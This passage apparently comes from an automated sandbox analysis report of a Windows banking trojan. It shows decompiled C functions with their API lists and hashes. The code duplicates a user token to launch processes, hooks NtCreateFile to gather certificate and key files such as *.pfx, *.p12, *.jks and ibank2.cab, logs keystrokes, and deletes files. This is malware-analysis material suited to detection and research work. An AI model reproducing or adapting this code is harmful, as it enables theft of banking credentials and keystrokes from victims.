						if(GetWindowThreadProcessId(GetForegroundWindow(),  &_a4) > 0) {
							_t84 = OpenProcess(0x400, 0, _a4);
							if(_t84 != 0) {
								if(OpenProcessToken(_t84, 0xb,  &_v16) != 0) {
									_t86 = 1;
								}
								CloseHandle(_t84);
							}
						}
						if(_t86 != 1) {
							goto L26;
						} else {
							L16:
							_v12 = 0;
							if(DuplicateTokenEx(_v16, 0x2000000, 0, 1, 1,  &_v12) != 0) {
								_t87 = LoadLibraryA("userenv.dll");
								_v20 = 0;
								_a4 = 0;
								if(_t87 != 0) {
									_t83 = GetProcAddress(_t87, "CreateEnvironmentBlock");
									_v20 = GetProcAddress(_t87, "DestroyEnvironmentBlock");
									if(_t83 != 0) {
										_push(0);
										_push(_v12);
										_push( &_a4);
										if( *_t83() == 0) {
											_a4 = 0;
										}
									}
								}
								_t63 = CreateProcessAsUserW(_v12, _a8, _a12, 0, 0, 0, 0x400, _a4, 0,  &_v112,  &_v36);
								asm("sbb esi, esi");
								_t86 =  ~( ~_t63);
								if(_v20 != 0 && _a4 != 0) {
									_v20(_a4);
								}
								CloseHandle(_v12);
							}
							CloseHandle(_v16);
							if(_t86 == 1) {
								L27:
								CloseHandle(_v36);
								CloseHandle(_v36.hThread);
								return _v36.dwProcessId;
							} else {
								goto L26;
							}
						}
					}
					_t74 = LoadLibraryA("wtsapi32.dll");
					_a4 = _t74;
					if(_t74 != 0) {
						_t85 =  *_t82();
						if(_t85 != 0xffffffff) {
							_t77 = GetProcAddress(_a4, "WTSQueryUserToken");
							if(_t77 != 0) {
								_push( &_v16);
								_push(_t85);
								if( *_t77() != 0) {
									_t86 = 1;
								}
							}
						}
						FreeLibrary(_a4);
						if(_t86 == 1) {
							goto L16;
						}
					}
					goto L10;
				}
			}



















        0x0040b4d1
        0x0040b4da
        0x0040b4dc
        0x0040b4e1
        0x0040b4e4
        0x0040b4ea
        0x0040b679
        0x0040b68d
        0x0040b695
        0x0040b6b0
        0x0040b6b0
        0x00000000
        0x0040b50a
        0x0040b515
        0x0040b51e
        0x0040b522
        0x0040b56b
        0x0040b56f
        0x0040b581
        0x0040b592
        0x0040b596
        0x0040b5a7
        0x0040b5ab
        0x0040b5ab
        0x0040b5ad
        0x0040b5ad
        0x0040b596
        0x0040b5b6
        0x00000000
        0x0040b5bc
        0x0040b5bc
        0x0040b5cd
        0x0040b5d8
        0x0040b5e9
        0x0040b5eb
        0x0040b5ee
        0x0040b5f3
        0x0040b607
        0x0040b60f
        0x0040b614
        0x0040b616
        0x0040b617
        0x0040b61d
        0x0040b622
        0x0040b624
        0x0040b624
        0x0040b622
        0x0040b614
        0x0040b644
        0x0040b64e
        0x0040b650
        0x0040b655
        0x0040b65f
        0x0040b65f
        0x0040b665
        0x0040b665
        0x0040b66e
        0x0040b677
        0x0040b697
        0x0040b69a
        0x0040b6a3
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040b677
        0x0040b5b6
        0x0040b529
        0x0040b52f
        0x0040b534
        0x0040b538
        0x0040b53d
        0x0040b547
        0x0040b54f
        0x0040b554
        0x0040b555
        0x0040b55a
        0x0040b55c
        0x0040b55c
        0x0040b55a
        0x0040b54f
        0x0040b560
        0x0040b569
        0x00000000
        0x00000000
        0x0040b569
        0x00000000
        0x0040b534

        APIs
        • GetProcAddress.KERNEL32(WTSGetActiveConsoleSessionId,00000000), ref: 0040B518
        • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 0040B529
        • GetProcAddress.KERNEL32(?,WTSQueryUserToken), ref: 0040B547
        • FreeLibrary.KERNEL32(?), ref: 0040B560
        • GetForegroundWindow.USER32(?), ref: 0040B572
        • GetWindowThreadProcessId.USER32(00000000), ref: 0040B579
        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040B58C
        • OpenProcessToken.ADVAPI32(00000000,0000000B,?), ref: 0040B59F
        • CloseHandle.KERNEL32(00000000), ref: 0040B5AD
        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 0040B5D0
        • LoadLibraryA.KERNEL32(userenv.dll), ref: 0040B5E3
        • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040B5FB
        • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 0040B609
        • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 0040B644
        • CloseHandle.KERNEL32(?), ref: 0040B665
        • CloseHandle.KERNEL32(?), ref: 0040B66E
        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000044,?,?,00000000), ref: 0040B68D
        • CloseHandle.KERNEL32(?), ref: 0040B69A
        • CloseHandle.KERNEL32(?), ref: 0040B6A3
          • Part of subcall function 0040B6B3: OpenWindowStationA.USER32(?,00000000,10000000), ref: 0040B6C7
          • Part of subcall function 0040B6B3: SetProcessWindowStation.USER32(00000000), ref: 0040B6D4
          • Part of subcall function 0040B6B3: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 0040B6E9
          • Part of subcall function 0040B6B3: SetThreadDesktop.USER32(00000000), ref: 0040B6F6
          • Part of subcall function 0040B6B3: CloseDesktop.USER32(00000000), ref: 0040B6FF
          • Part of subcall function 0040B6B3: CloseWindowStation.USER32(00000000), ref: 0040B706
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Close$Process$HandleWindow$AddressOpenProc$DesktopLibraryStation$CreateLoadThreadToken$DuplicateForegroundFreeUser
        • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$WTSGetActiveConsoleSessionId$WTSQueryUserToken$userenv.dll$wtsapi32.dll
        • API String ID: 1454815141-2217652461
        • Opcode ID: 4b11768f59a542fdf487dcb0a297275a3d00764a6299e36aec03c6cadcf043d2
        • Instruction ID: d4e3d2a24ac4a6396a5aa13b1ca398a9f11103fb085fa0c9a777eeaa8b0c0aac
        • Opcode Fuzzy Hash: 4b11768f59a542fdf487dcb0a297275a3d00764a6299e36aec03c6cadcf043d2
        • Instruction Fuzzy Hash: 49515C72900218BFDF119FA0DC88EEE7BB9EB44745F14843AF915B62A0D7358A408B9C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405F35, Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 159filenativeCOMMON
        Download Yara Rule
        C-Code - Quality: 94%
        			E00405F35(void* __edi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v532;
				short _v540;
				long _t57;
				void* _t74;
				signed short* _t78;
				signed int _t79;
				struct _EXCEPTION_RECORD _t95;
				void* _t96;
				void* _t97;
				char* _t98;
				WCHAR* _t101;
				WCHAR* _t102;
				void* _t103;
				char _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				char _t117;
				intOrPtr _t118;
				intOrPtr _t122;
				intOrPtr _t123;

				_t97 = __edi;
				_t95 = _a12;
				_v540 = 0;
				_t104 =  *0x41479c; // 0x65
				if(_t104 != 0) {
					L4:
					if(_a4 != 0 && _t95 != 0 && (_a32 & 0x00000003) != 0) {
						_t78 =  *(_t95 + 8);
						if(_t78 != 0) {
							_t79 =  *_t78 & 0x0000ffff;
							if(_t79 > 0xa && _t79 < 0x206) {
								E0040F19A( &_v540, ( *(_t95 + 8))[2],  *( *(_t95 + 8)) & 0x0000ffff);
								 *((short*)(_t103 + (( *( *(_t95 + 8)) & 0x0000ffff) >> 1) * 2 - 0x218)) = 0;
							}
						}
					}
					L11:
					_t100 = _a4;
					_t57 = NtCreateFile(_a4, _a8, _t95, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
					_a32 = _t57;
					if(_t57 == 0 && _v540 > 0) {
						_push(_t97);
						_t98 = L"*.pem";
						_t117 =  *0x41479c; // 0x65
						if(_t117 != 0) {
							 *0x41479c = 0;
							_v20 = L"*.dat";
							_v16 = _t98;
							_v12 = L"*.p12";
							_v8 = 0;
							E00405E39( &_v20,  &_v540, _t117, 1,  *_t100, L"ibank2.cab", 0);
							 *0x41479c = 1;
						}
						_t118 =  *0x41479f; // 0x69
						if(_t118 != 0) {
							_t101 = L"sign.cer";
							_v16 = L"prv_key.pfx";
							_v12 = _t101;
							_v8 = 0;
							if(E00405E39( &_v16,  &_v540, _t118, 0,  *_a4, L"faktura", 0) == 0) {
								PathRemoveFileSpecW( &_v540);
								PathCombineW( &_v540,  &_v540, _t101);
								_push(L"\\??\\");
								_t96 = 4;
								_t102 =  &_v540;
								if(E0040F6F6(_t96, _t102, _t96) == 0) {
									_t102 =  &_v532;
								}
								_t74 = CreateFileW(_t102, 0x80000000, 3, 0, 3, 0, 0);
								if(_t74 != 0xffffffff) {
									CloseHandle(_t74);
								}
							}
						}
						_t122 =  *0x41479e; // 0x74
						if(_t122 != 0) {
							 *0x41479e = 0;
							_v20 = L"*.db3";
							_v16 = _t98;
							_v12 = L"*.key";
							_v8 = 0;
							E00405E39( &_v20,  &_v540, _t122, 1,  *_a4, L"interpro.cab", 1);
							 *0x41479e = 1;
						}
						_t123 =  *0x41479d; // 0x74
						if(_t123 != 0) {
							_v12 = L"*.jks";
							_v8 = 0;
							E00405E39( &_v12,  &_v540, _t123, 0,  *_a4, L"jks", 0);
						}
					}
					return _a32;
				}
				_t105 =  *0x41479f; // 0x69
				if(_t105 != 0) {
					goto L4;
				}
				_t106 =  *0x41479e; // 0x74
				if(_t106 != 0) {
					goto L4;
				}
				_t107 =  *0x41479d; // 0x74
				if(_t107 == 0) {
					goto L11;
				}
				goto L4;
			}




























        0x00405f35
        0x00405f3e
        0x00405f47
        0x00405f4e
        0x00405f54
        0x00405f6e
        0x00405f71
        0x00405f7d
        0x00405f82
        0x00405f84
        0x00405f8b
        0x00405fa8
        0x00405fb7
        0x00405fb7
        0x00405f8b
        0x00405f82
        0x00405fbf
        0x00405fc2
        0x00405fdf
        0x00405fe5
        0x00405fea
        0x00405ffd
        0x00405ffe
        0x00406003
        0x00406009
        0x0040601e
        0x00406024
        0x0040602b
        0x0040602e
        0x00406035
        0x00406038
        0x0040603d
        0x0040603d
        0x00406044
        0x0040604a
        0x0040605b
        0x0040606a
        0x00406071
        0x00406074
        0x0040607e
        0x00406087
        0x00406096
        0x0040609c
        0x004060a3
        0x004060a4
        0x004060b5
        0x004060b7
        0x004060b7
        0x004060ca
        0x004060d3
        0x004060d6
        0x004060d6
        0x004060d3
        0x0040607e
        0x004060dc
        0x004060e2
        0x004060fb
        0x00406101
        0x00406108
        0x0040610b
        0x00406112
        0x00406115
        0x0040611a
        0x0040611a
        0x00406122
        0x00406128
        0x0040613f
        0x00406146
        0x00406149
        0x00406149
        0x00406128
        0x00406154
        0x00406154
        0x00405f56
        0x00405f5c
        0x00000000
        0x00000000
        0x00405f5e
        0x00405f64
        0x00000000
        0x00000000
        0x00405f66
        0x00405f6c
        0x00000000
        0x00000000
        0x00000000

        APIs
        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00405FDF
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 00406087
        • PathCombineW.SHLWAPI(?,?,sign.cer), ref: 00406096
        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,\??\), ref: 004060CA
        • CloseHandle.KERNEL32(00000000), ref: 004060D6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$CreatePath$CloseCombineHandleRemoveSpec
        • String ID: *.dat$*.db3$*.jks$*.key$*.p12$*.pem$\??\$faktura$ibank2.cab$interpro.cab$jks$prv_key.pfx$sign.cer
        • API String ID: 1502233104-928899744
        • Opcode ID: 3bff7efcf6c74ec80a9d84fd61ce71c33da85ae4c69256dd1681b6fa86ab65ec
        • Instruction ID: 3bc306c77b7a143edd12a7e9b058f65d7dc864529343ddc5b116cba2421c5e03
        • Opcode Fuzzy Hash: 3bff7efcf6c74ec80a9d84fd61ce71c33da85ae4c69256dd1681b6fa86ab65ec
        • Instruction Fuzzy Hash: E6519B71940259AFDF10DF90DC84AEEBB68EB15314F0481BAF905B72E1D7788A94CB98
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004048AC, Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 153filesynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 85%
        			E004048AC(WCHAR* __ecx, intOrPtr __edx) {
				char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				WCHAR* _v572;
				WCHAR* _v574;
				struct _WIN32_FIND_DATAW _v620;
				short _v622;
				short _v1140;
				short _v1660;
				void* _t57;
				int _t63;
				long _t67;
				intOrPtr _t69;
				WCHAR** _t70;
				int _t72;
				intOrPtr _t79;
				intOrPtr _t82;
				WCHAR* _t87;
				long _t89;
				intOrPtr _t93;
				signed int _t99;
				intOrPtr _t100;
				char _t101;
				void* _t102;

				_t98 = __edx;
				_t97 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				PathCombineW( &_v1140, __ecx, "*");
				_v622 = 0;
				_t57 = FindFirstFileW( &_v1140,  &_v620);
				_v12 = _t57;
				if(_t57 != 0xffffffff) {
					__eflags = 0;
					do {
						__eflags = _v620.cFileName - 0x2e;
						if(_v620.cFileName != 0x2e) {
							L7:
							__eflags = _v620.dwFileAttributes & 0x00000010;
							if((_v620.dwFileAttributes & 0x00000010) == 0) {
								 *0x414ed8("pVirtualKeyExA");
								_t99 = 0;
								__eflags =  *0x414778; // 0x74537972
								if(__eflags <= 0) {
									L21:
									 *0x414edc("pVirtualKeyExA");
									Sleep(0x14);
									L22:
									__eflags =  *0x414778; // 0x74537972
									if(__eflags <= 0) {
										break;
									}
									goto L23;
								} else {
									goto L11;
								}
								do {
									L11:
									_t69 =  *0x41477c; // 0x676e6972
									_t70 = _t69 + _t99 * 4;
									__eflags =  *_t70;
									if( *_t70 == 0) {
										goto L16;
									}
									__eflags = _v620.nFileSizeHigh;
									if(_v620.nFileSizeHigh != 0) {
										goto L16;
									}
									_t72 = PathMatchSpecW( &(_v620.cFileName),  *_t70);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L16;
									}
									PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
									_t101 = _v620.nFileSizeLow;
									_t79 =  *0x414ad4; // 0x241f5a8
									_v8 = 4;
									_v16 = 0;
									__eflags = E004085D2(0x80000001,  *((intOrPtr*)(_t79 + 0x174)),  &_v1140, 0,  &_v16,  &_v8);
									if(__eflags == 0) {
										L18:
										_t82 =  *0x414ad4; // 0x241f5a8
										wnsprintfW( &_v1660, 0x103,  *(_t82 + 0x178), _v620.nFileSizeLow,  &(_v620.cFileName));
										_t102 = _t102 + 0x14;
										_t87 = E00413599(_t97, _t98, __eflags,  &_v1140, 0,  &_v1660);
										__eflags = _t87;
										if(_t87 != 0) {
											_v8 = _v620.nFileSizeLow;
											_t93 =  *0x414ad4; // 0x241f5a8
											E0040861B(0x80000001,  *((intOrPtr*)(_t93 + 0x174)),  &_v1140, 4,  &_v8, 4);
										}
										_t89 = WaitForSingleObject( *(_v20 + 4), 0x2710);
										__eflags = _t89;
										if(_t89 == 0) {
											goto L24;
										} else {
											goto L21;
										}
									}
									__eflags = _t101 - _v16;
									if(__eflags != 0) {
										goto L18;
									}
									L16:
									_t99 = _t99 + 1;
									__eflags = _t99 -  *0x414778; // 0x74537972
								} while (__eflags < 0);
								goto L21;
							}
							PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
							_t100 = _v20;
							_t67 = WaitForSingleObject( *(_t100 + 4), 0x3e8);
							__eflags = _t67;
							if(_t67 == 0) {
								break;
							}
							_t98 = _t100;
							_t97 =  &_v1140;
							E004048AC( &_v1140, _t100);
							goto L22;
						}
						__eflags = _v574;
						if(_v574 == 0) {
							goto L22;
						}
						__eflags = _v574 - 0x2e;
						if(_v574 != 0x2e) {
							goto L7;
						}
						__eflags = _v572;
						if(_v572 == 0) {
							goto L22;
						}
						goto L7;
						L23:
						_t63 = FindNextFileW(_v12,  &_v620);
						__eflags = _t63;
					} while (_t63 != 0);
					L24:
					FindClose(_v12);
					return 1;
				}
				return 0;
			}





























        0x004048ac
        0x004048ac
        0x004048c5
        0x004048c8
        0x004048cb
        0x004048d3
        0x004048e8
        0x004048ee
        0x004048f4
        0x004048fd
        0x004048ff
        0x004048ff
        0x00404907
        0x0040492d
        0x0040492d
        0x00404934
        0x0040497d
        0x00404983
        0x00404985
        0x0040498b
        0x00404aa6
        0x00404aab
        0x00404ab3
        0x00404ab9
        0x00404ab9
        0x00404abf
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00404991
        0x00404991
        0x00404991
        0x00404996
        0x00404999
        0x0040499b
        0x00000000
        0x00000000
        0x0040499d
        0x004049a3
        0x00000000
        0x00000000
        0x004049ae
        0x004049b4
        0x004049b6
        0x00000000
        0x00000000
        0x004049c9
        0x004049cf
        0x004049e5
        0x004049f0
        0x004049fc
        0x00404a04
        0x00404a06
        0x00404a1f
        0x00404a2c
        0x00404a43
        0x00404a49
        0x00404a5b
        0x00404a60
        0x00404a62
        0x00404a6c
        0x00404a7c
        0x00404a8c
        0x00404a8c
        0x00404a9c
        0x00404aa2
        0x00404aa4
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00404aa4
        0x00404a08
        0x00404a0b
        0x00000000
        0x00000000
        0x00404a0d
        0x00404a0d
        0x00404a0e
        0x00404a0e
        0x00000000
        0x00404a1a
        0x00404947
        0x0040494d
        0x00404958
        0x0040495e
        0x00404960
        0x00000000
        0x00000000
        0x00404966
        0x00404968
        0x0040496e
        0x00000000
        0x0040496e
        0x00404909
        0x00404910
        0x00000000
        0x00000000
        0x00404916
        0x0040491e
        0x00000000
        0x00000000
        0x00404920
        0x00404927
        0x00000000
        0x00000000
        0x00000000
        0x00404ac1
        0x00404acb
        0x00404ad1
        0x00404ad1
        0x00404ad9
        0x00404adc
        0x00000000
        0x00404ae2
        0x00000000

        APIs
        • PathCombineW.SHLWAPI(?,?,00401040), ref: 004048CB
        • FindFirstFileW.KERNEL32(?,?,?,00401040), ref: 004048E8
        • PathCombineW.SHLWAPI(?,?,0000002E,?,00401040), ref: 00404947
        • WaitForSingleObject.KERNEL32(?,000003E8,?,00401040), ref: 00404958
        • FindNextFileW.KERNEL32(?,00000010,?,00401040), ref: 00404ACB
        • FindClose.KERNEL32(?,?,00401040), ref: 00404ADC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Find$CombineFilePath$CloseFirstNextObjectSingleWait
        • String ID: .$.$pVirtualKeyExA$ryStringW
        • API String ID: 3352328711-2950257443
        • Opcode ID: cbd02deef1ff97b2d1742cf17d8c404e463d902302e6a5a390249f053469cc14
        • Instruction ID: ce8ce76526c5f289c7fc2b2e7ca56b88422c33298fadce1b66af44ccf44db814
        • Opcode Fuzzy Hash: cbd02deef1ff97b2d1742cf17d8c404e463d902302e6a5a390249f053469cc14
        • Instruction Fuzzy Hash: C35120B1940219EFDF21DFA0DC48AEA77B8FB84304F1180B6A719B31A0D7759A95CF58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040668F, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109keyboardCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040668F(void* __edx, int _a4) {
				char _v520;
				short _v524;
				char _v780;
				short _v782;
				short _v784;
				char _v785;
				void* __edi;
				void* __esi;
				int _t23;
				intOrPtr _t35;
				long _t39;
				intOrPtr _t40;
				void* _t50;
				void* _t51;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t67;

				_t51 = __edx;
				_t23 = _a4;
				if(_t23 == 0) {
					L15:
					return _t23;
				}
				_t23 =  *(_t23 + 4);
				if(_t23 != 0x201) {
					if(_t23 != 0x100) {
						goto L15;
					}
					_t23 = GetKeyState(0x11);
					if((0x80000000 & _t23) != 0) {
						goto L15;
					}
					_t23 = GetKeyState(0x12);
					if((0x80000000 & _t23) != 0) {
						goto L15;
					}
					L10:
					_v782 = 0;
					_t23 = GetKeyboardState( &_v780);
					if(_t23 != 0) {
						_t23 = ToUnicode( *(_a4 + 8), 0,  &_v780,  &_v784, 1, 0);
						if(_t23 == 1) {
							_v785 = 0;
							_t23 = WideCharToMultiByte(0, 0,  &_v784, 1,  &_v785, 1, 0, 0);
							if(_t23 != 0 && _v785 != 0) {
								_t23 = E0040642E(_t50, 1,  &_v785);
							}
						}
					}
					goto L15;
				}
				_t67 =  *0x4147c8; // 0x7349
				if(_t67 == 0) {
					goto L15;
				} else {
					 *0x4147c8 =  *0x4147c8 + 0xffff;
					_t35 =  *0x414ad4; // 0x241f5a8
					_t60 = E00408DDB( *((intOrPtr*)(_t35 + 0x70)), 0x1e, 0x1f4);
					if(_t60 != 0) {
						_t39 = GetCurrentProcessId();
						_t40 =  *0x414ad4; // 0x241f5a8
						wnsprintfW( &_v524, 0x103,  *(_t40 + 0x74), _t56, _t39);
						E004134BF(_t51, _t60,  &_v520);
						 *((intOrPtr*)( *_t60 + 8))(_t60, GetTickCount());
					}
					goto L10;
				}
			}




















        0x0040668f
        0x00406695
        0x004066a5
        0x004067cc
        0x004067d2
        0x004067d2
        0x004066ab
        0x004066b3
        0x00406743
        0x00000000
        0x00000000
        0x00406751
        0x00406759
        0x00000000
        0x00000000
        0x00406763
        0x00406766
        0x00000000
        0x00000000
        0x00406768
        0x0040676a
        0x00406774
        0x0040677c
        0x00406794
        0x0040679c
        0x004067ae
        0x004067b2
        0x004067ba
        0x004067c7
        0x004067c7
        0x004067ba
        0x0040679c
        0x00000000
        0x0040677c
        0x004066b9
        0x004066c0
        0x00000000
        0x004066c6
        0x004066cb
        0x004066d2
        0x004066e6
        0x004066ea
        0x00406703
        0x0040670a
        0x00406720
        0x00406731
        0x00406739
        0x00406739
        0x00000000
        0x004066ea

        APIs
        • GetTickCount.KERNEL32 ref: 004066FC
        • GetCurrentProcessId.KERNEL32(00000000), ref: 00406703
        • wnsprintfW.SHLWAPI ref: 00406720
        • GetKeyState.USER32(00000011), ref: 0040674B
        • GetKeyState.USER32(00000012), ref: 0040675D
        • GetKeyboardState.USER32(?), ref: 00406774
        • ToUnicode.USER32(?,00000000,?,?,00000001,00000000), ref: 00406794
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 004067B2
          • Part of subcall function 00408DDB: LoadLibraryA.KERNELBASE(?), ref: 00408DF2
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E06
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E1B
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E30
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E45
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E5A
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E6F
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408E84
          • Part of subcall function 00408DDB: LoadLibraryA.KERNELBASE(?), ref: 00408EE0
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408EF4
          • Part of subcall function 00408DDB: LoadLibraryA.KERNELBASE(?), ref: 00408F18
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F2C
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F40
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F55
          • Part of subcall function 00408DDB: GetProcAddress.KERNELBASE(00000000,?), ref: 00408F6A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$LibraryLoadState$ByteCharCountCurrentKeyboardMultiProcessTickUnicodeWidewnsprintf
        • String ID: ageW$unknown
        • API String ID: 1117135736-3712389677
        • Opcode ID: fcd4f8e1635c732f9d757c27aeb453b66c71ca0fa58c1426051aa109b8b33688
        • Instruction ID: bfaa6e137cb16a25e10779f31c3fe6c7c5f454a8f81471095807dff661065e35
        • Opcode Fuzzy Hash: fcd4f8e1635c732f9d757c27aeb453b66c71ca0fa58c1426051aa109b8b33688
        • Instruction Fuzzy Hash: FE310172100206ABD720EBA4DC88EDB7BECEB84754F02453AF545E7290D634CC688769
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040C598, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82fileCOMMON
        Download Yara Rule
        C-Code - Quality: 88%
        			E0040C598(void* __ecx) {
				short _v548;
				char _v556;
				struct _WIN32_FIND_DATAW _v1140;
				struct _WIN32_FIND_DATAW _v1148;
				char _v1412;
				char _v1416;
				char _v1900;
				short _v1916;
				short _v1924;
				int _t17;
				intOrPtr _t18;
				void* _t40;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t47;
				char* _t49;

				_t43 = __ecx;
				_t17 =  *0x414b58(0,  &_v1900, 0x1a, 0, _t44, _t47, _t40);
				if(_t17 != 0) {
					_t18 =  *0x414ad4; // 0x241f5a8
					PathCombineW( &_v1916,  &_v1916,  *(_t18 + 0x198));
					_t17 = FindFirstFileW( &_v1924,  &_v1140);
					_t42 = _t17;
					_t54 = _t42 - 0xffffffff;
					if(_t42 != 0xffffffff) {
						PathRemoveFileSpecW( &_v1924);
						_t49 = "M<,,>Keolkp90344";
						do {
							PathCombineW( &_v548,  &_v1924,  &(_v1140.cFileName));
							WideCharToMultiByte(0, 0,  &(_v1148.cFileName), 0xffffffff,  &_v1412, 0x103, 0, 0);
							if(E00408849(_t43, _t54, _t49,  &_v1412, 0) == 0) {
								E00410093( &_v556);
								E00408906(_t43, 0, _t49,  &_v1416, 0);
							}
						} while (FindNextFileW(_t42,  &_v1148) != 0);
						_t17 = FindClose(_t42);
					}
				}
				return _t17;
			}




















        0x0040c598
        0x0040c5b2
        0x0040c5ba
        0x0040c5c0
        0x0040c5d1
        0x0040c5e4
        0x0040c5ea
        0x0040c5ec
        0x0040c5ef
        0x0040c5fa
        0x0040c600
        0x0040c605
        0x0040c61a
        0x0040c63b
        0x0040c652
        0x0040c65c
        0x0040c66c
        0x0040c66c
        0x0040c680
        0x0040c685
        0x0040c685
        0x0040c5ef
        0x0040c691

        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,?,-00000002), ref: 0040C5B2
        • PathCombineW.SHLWAPI(?,?,?), ref: 0040C5D1
        • FindFirstFileW.KERNEL32(?,?), ref: 0040C5E4
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 0040C5FA
        • PathCombineW.SHLWAPI(?,?,?), ref: 0040C61A
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000103,00000000,00000000), ref: 0040C63B
        • FindNextFileW.KERNEL32(00000000,?,M<,,>Keolkp90344,?,00000000), ref: 0040C67A
        • FindClose.KERNEL32(00000000), ref: 0040C685
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Path$Find$Combine$AttributesByteCharCloseDeleteFirstFolderMultiNextRemoveSpecSpecialWide
        • String ID: M<,,>Keolkp90344
        • API String ID: 4081021945-3583232063
        • Opcode ID: b11c95862ccdfd5fdc3a069568385c0943893b3927aa0ff2c89cadaa59407220
        • Instruction ID: 827415808a01aa42485ddb67e6e7ead96fa149ea36097afb80b13c8dfb405185
        • Opcode Fuzzy Hash: b11c95862ccdfd5fdc3a069568385c0943893b3927aa0ff2c89cadaa59407220
        • Instruction Fuzzy Hash: 082151B2404245ABD720DBA1ED8CDEB77ECEBC9710F004A3AB959D2090E7359509CB7A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040B844, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75fileCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040B844(WCHAR* __ecx, intOrPtr __edx) {
				short _v524;
				short _v532;
				char _v540;
				short _v1076;
				short _v1078;
				struct _WIN32_FIND_DATAW _v1124;
				struct _WIN32_FIND_DATAW _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				void* _t29;
				signed char _t46;
				void* _t52;
				WCHAR* _t55;

				_t55 = __ecx;
				_v1132.ftLastAccessTime = __edx;
				PathCombineW( &_v524, __ecx, "*");
				_t29 = FindFirstFileW( &_v532,  &_v1124);
				_v1132.dwFileAttributes = _v1132.dwFileAttributes & 0x00000000;
				_t52 = _t29;
				if(_t52 == 0xffffffff) {
					L13:
					return _v1132.dwFileAttributes;
				} else {
					goto L1;
				}
				L11:
				if(FindNextFileW(_t52,  &_v1132) != 0) {
					L1:
					if(_v1124.cFileName != 0x2e || _v1078 != 0 && (_v1078 != 0x2e || _v1076 != 0)) {
